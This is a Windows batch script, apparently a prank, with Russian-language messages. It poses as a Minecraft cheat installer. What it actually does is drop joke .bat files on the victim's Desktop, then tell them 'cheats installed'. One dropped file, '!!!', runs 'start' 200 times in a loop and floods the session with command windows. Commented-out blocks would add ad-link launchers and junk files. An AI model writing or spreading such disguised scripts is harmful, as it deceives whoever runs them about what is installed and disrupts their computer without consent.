@echo off
::Batch
chcp 65001 > nul



set qw="чит-майнкрафт"
echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo msg * （︶^^^^^^︶）Говорю сразу Дима не написал читы >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

set qw="взлом_пентагона"
echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo msg * вам звонит Путин （￣︶￣） >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

set qw="!!!"
echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo set /a g=0 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo :888 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo if %%g%% lss 200 ( >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo set /a g=g+1 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo start >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo goto 888 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
echo ) >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"



@REM set qw="реклама_0"
@REM echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo start "" https://koto-games.itch.io >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

@REM set qw="реклама_1"
@REM echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo start "" https://www.youtube.com/channel/UCpaHHdNSTiqEyerMALQiCtQ >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

@REM set qw="реклама_2"
@REM echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo start "" https://speechpad.ru >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

@REM set qw="реклама_3"
@REM echo @echo off > "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo chcp 65001 >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"
@REM echo start "" https://github.com/koto-games >> "C:/Users/%USERNAME%/Desktop/%qw%.bat"

@REM ::@
@REM set /a ooo=0
@REM :aaa
@REM if %ooo% lss 5 (
@REM set /a ooo=ooo+1
@REM echo !!! > "C:/Users/%USERNAME%/Desktop/жора_%ooo%"
@REM goto aaa
@REM )
@REM ::@




msg * читы установлены
msg * читы ты можешь найти на рабочем столе
::start "" https://koto-games.itch.io